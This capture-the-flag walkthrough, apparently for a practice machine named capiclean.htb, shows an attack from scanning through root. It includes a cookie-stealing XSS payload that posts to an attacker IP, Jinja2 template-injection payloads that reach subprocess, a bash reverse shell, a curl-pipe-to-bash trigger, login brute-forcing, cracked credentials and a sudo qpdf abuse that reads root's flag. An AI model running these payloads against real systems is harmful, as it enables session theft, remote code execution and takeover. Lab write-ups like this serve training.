TCP Scan

> TARGET=10.129.44.91 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/tcp

> curl http://10.129.44.91/
<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="refresh" content="0;url=http://capiclean.htb">
</head>
<body>
    <!-- Optional content for users without JavaScript -->
    <p>If you are not redirected, <a href="http://capiclean.htb">click here</a>.</p>
</body>
</html>

• add entry

10.129.44.91    capiclean.htb

• subdomain enum

> wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://capiclean.htb/" -H "Host: FUZZ.capiclean.htb"
[x]

• get possible user/contact info from html

> curl http://capiclean.htb/ | html2text

***** Mary Pikes *****
Introducing Mary Pikes: a dedicated and efficient cleaner with a flair for
perfection. With Mary's meticulous attention to detail and commitment to
excellence, your space will be transformed into a pristine haven. Trust Mary to
bring a touch of sparkle to every corner, leaving you delighted with the
results.
***** Martha Smith *****
Meet Martha, your passionate cleaner who brings joy to every space she touch.
With 10 years of experience, she transforms spaces into immaculate sanctuaries,
leaving smiles in her wake.
[/static/images/img-5.png]
[/static/images/img-6.png]
***** Jasmine Summers *****
Meet Jasmine, your dedicated cleaner who takes pride in her work. With 5 years
of experience, she brings a touch of magic to every corner, creating spaces
that sparkle with cleanliness and warmth.
***** Mike Samuels *****
Meet Mike, your friendly and meticulous cleaner. With a passion for cleanliness
and an eye for detail, Mike ensures that every space he touches shines with
perfection. Trust Mike to leave your home or office spotless and inviting,
every time.
[/static/images/img-7.png]

****** Contact  [/static/images/icon-2.png] Us ******
[/static/images/map-icon.png]Locations
[/static/images/call-icon.png]+12_345678901234
[/static/images/map-icon.png]contact@capiclean.htb

• dirsearch

> dirsearch -u http://capiclean.htb/
[10:33:04] 200 -    5KB - /about
[10:33:42] 302 -  189B  - /dashboard  ->  /
[10:34:04] 200 -    2KB - /login
[10:34:05] 302 -  189B  - /logout  ->  /
[10:34:29] 403 -  278B  - /server-status
[10:34:29] 403 -  278B  - /server-status/
[10:34:29] 200 -    2KB - /services

• Found two endpoints where post can be sent

POST /login HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/login
Upgrade-Insecure-Requests: 1

username=test&password=test


POST /sendMessage HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/quote
Upgrade-Insecure-Requests: 1

service=...&email=test%40test.com|id

• try bruteforce the login

> hydra -L /usr/share/wordlists/SecLists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt capiclean.htb http-post-form "/login:username=^USER^&password=^PASS^:F=Incorrect"

> hydra -C /usr/share/wordlists/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt capiclean.htb http-post-form "/login:username=^USER^&password=^PASS^:F=Incorrect"
* SecLists/Passwords/Common-Credentials/10k-most-common.txt
[x]

• try cmd injection to the sendMessage endpoint

> wfuzz -w /usr/share/wordlists/Auto_Wordlists/custom_wordlists/command_injection.txt -u http://capiclean.htb/sendMessage -d "service=FUZZ&email=asdf%40fdasf.com"
> wfuzz -w '/usr/share/wordlists/PayloadsAllTheThings/Server Side Template Injection/README.md' -u http://capiclean.htb/sendMessage -d "service=FUZZ&email=asdf%40fdasf.com" --hh 5048

> curl http://capiclean.htb/sendMessage -d "service=`curl 10.10.16.59`&email=asdf%40fdasf.com"
[x]

• found xss vulnerability

> curl http://capiclean.htb/sendMessage -d 'service='$(urlencode '<img src=x onerror=this.src="http://10.10.16.59/?c1="+btoa(document.cookie)>')'&email=test%40test.com'

10.129.43.173 - - [08/Apr/2024 11:46:16] "GET /?c1=c2Vzc2lvbj1leUp5YjJ4bElqb2lNakV5TXpKbU1qazNZVFUzWVRWaE56UXpPRGswWVRCbE5HRTRNREZtWXpNaWZRLlpoR3lSZy5ucFdnNS1yQUZoNmhqRjE2VVQ1T0pseDZRQk0= HTTP/1.1" 200 -

• decode the session key, add to browser cookie and then access http://capiclean.htb/dashboard

echo 'c2Vzc2lvbj1leUp5YjJ4bElqb2lNakV5TXpKbU1qazNZVFUzWVRWaE56UXpPRGswWVRCbE5HRTRNREZtWXpNaWZRLlpoR3lSZy5ucFdnNS1yQUZoNmhqRjE2VVQ1T0pseDZRQk0=' | base64 -d
session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhGyRg.npWg5-rAFh6hjF16UT5OJlx6QBM

80/tcp Admin dashboard

• check out the QR geneartor, which is based on a template
• backend is Server: Werkzeug/2.3.7 Python/3.10.12
• try fuzzing

> wfuzz -w /usr/share/wordlists/Auto_Wordlists/wordlists/ssti.txt -H "Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhGyRg.npWg5-rAFh6hjF16UT5OJlx6QBM" -u http://capiclean.htb/QRGenerator -d "invoice_id=&form_type=scannable_invoice&qr_link=FUZZ"

• The field qr_link is vulnerable to ssti attack

POST /QRGenerator HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/QRGenerator
Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhGyRg.npWg5-rAFh6hjF16UT5OJlx6QBM
Upgrade-Insecure-Requests: 1

invoice_id=&form_type=scannable_invoice&qr_link=${{7*7}}


<div class="qr-code"><img src="data:image/png;base64,$49" alt="QR Code"></div>

• check out ssti bypass: https://www.jianshu.com/p/a736e39c3510
• from here onward, python sandbox escape technique is needed to traserve the code and look for things like subprocess.Popen for RCE

# traverse through __class__.__mro__.__subclasses__ and look for subprocess.Popen
> curl http://capiclean.htb/QRGenerator -H "Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhGyRg.npWg5-rAFh6hjF16UT5OJlx6QBM" -d 'invoice_id=&form_type=scannable_invoice&qr_link=${{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()}}' | grep base64

# get output from subprocess
> curl http://capiclean.htb/QRGenerator -H "Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhGyRg.npWg5-rAFh6hjF16UT5OJlx6QBM" -d 'invoice_id=&form_type=scannable_invoice&qr_link=${{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[365](["ls"],stdout=-1).communicate()}}' | grep base64

> echo -e $(curl http://capiclean.htb/QRGenerator -H "Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhGyRg.npWg5-rAFh6hjF16UT5OJlx6QBM" -d 'invoice_id=&form_type=scannable_invoice&qr_link=${{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[365](["ls","-la","/"],stdout=-1).communicate()}}' | grep base64)

<div class="qr-code-container"><div class="qr-code"><img src="data:image/png;base64,$(b&#39;total 76
drwxr-xr-x 18 root root 4096 Sep 27 2023 .
drwxr-xr-x 18 root root 4096 Sep 27 2023 ..
lrwxrwxrwx 1 root root 7 Aug 10 2023 bin -&gt; usr/bin
drwxr-xr-x 4 root root 4096 Apr 2 10:33 boot
drwxr-xr-x 20 root root 4020 Apr 6 20:33 dev
drwxr-xr-x 112 root root 4096 Apr 2 10:33 etc
drwxr-xr-x 3 root root 4096 Sep 5 2023 home
lrwxrwxrwx 1 root root 7 Aug 10 2023 lib -&gt; usr/lib
lrwxrwxrwx 1 root root 9 Aug 10 2023 lib32 -&gt; usr/lib32
lrwxrwxrwx 1 root root 9 Aug 10 2023 lib64 -&gt; usr/lib64
lrwxrwxrwx 1 root root 10 Aug 10 2023 libx32 -&gt; usr/libx32
drwx------ 2 root root 16384 Sep 5 2023 lost+found
drwxr-xr-x 2 root root 4096 Aug 10 2023 media
drwxr-xr-x 2 root root 4096 Aug 10 2023 mnt
drwxr-xr-x 3 root root 4096 Sep 21 2023 opt
dr-xr-xr-x 306 root root 0 Apr 6 20:33 proc
drwx------ 8 root root 4096 Apr 6 20:33 root
drwxr-xr-x 31 root root 860 Apr 7 04:46 run
lrwxrwxrwx 1 root root 8 Aug 10 2023 sbin -&gt; usr/sbin
drwxr-xr-x 2 root root 4096 Aug 10 2023 srv
dr-xr-xr-x 13 root root 0 Apr 6 20:33 sys
drwxrwxrwt 20 root root 12288 Apr 8 00:29 tmp
drwxr-xr-x 14 root root 4096 Aug 10 2023 usr
drwxr-xr-x 13 root root 4096 Sep 27 2023 var
&#39;, None)" alt="QR Code"></div>

foothold

• create and serve a shell

#!/usr/bin/bash
bash -i >& /dev/tcp/10.10.16.59/4444 0>&1

• trigger shell

> echo -e $(curl http://capiclean.htb/QRGenerator -H "Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhGyRg.npWg5-rAFh6hjF16UT5OJlx6QBM" -d 'invoice_id=&form_type=scannable_invoice&qr_link=${{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[365]("curl http://10.10.16.59/s.sh|bash",shell=True,stdout=-1).communicate()}}' | grep base64)

• check app.py found password

db_config = {
    'host': '127.0.0.1',
    'user': 'iclean',
    'password': 'pxCsmnGLckUb',
    'database': 'capiclean'
}

• local enum

www-data@iclean:/opt/app$ ls /home
ls /home
consuela

www-data@iclean:/opt/app$ mysql -uiclean -D capiclean --password
                          mysql -uiclean -D capiclean --password
mysql -uiclean -D capiclean --password
Enter password: pxCsmnGLckUb
                pxCsmnGLckUb
select * from users;
select * from users;
exit
exit
id      username        password        role_id
1       admin   2ae316f10d49222f369139ce899e414e57ed9e339bb75457446f2ba8628a6e51        21232f297a57a5a743894a0e4a801fc3
2       consuela        0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa        ee11cbb19052e40b07aac0ca060c23ee

• crack on https://crackstation.net/

0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa:simple and clean

• login via ssh

> ssh consuela@capiclean.htb
consuela@capiclean.htb's password:

consuela@iclean:~$ cat user.txt
3a102871afd9b53f026660931cc0e981

pe

consuela@iclean:~$ sudo -l
[sudo] password for consuela:
Matching Defaults entries for consuela on iclean:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User consuela may run the following commands on iclean:
    (ALL) /usr/bin/qpdf

• https://medium.com/secarmy/krack-jiit-ctf-writeup-92a5c2ca90c9

# on target
> sudo qpdf --empty --add-attachment /root/root.txt --mimetype=text/plain -- a.pdf
> sudo qpdf --object-streams=disable a.pdf b.pdf

# on kali
> binwalk -Me b.pdf --run-as=root
ca05e751aa424b744ee33ad9d63bbb39

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack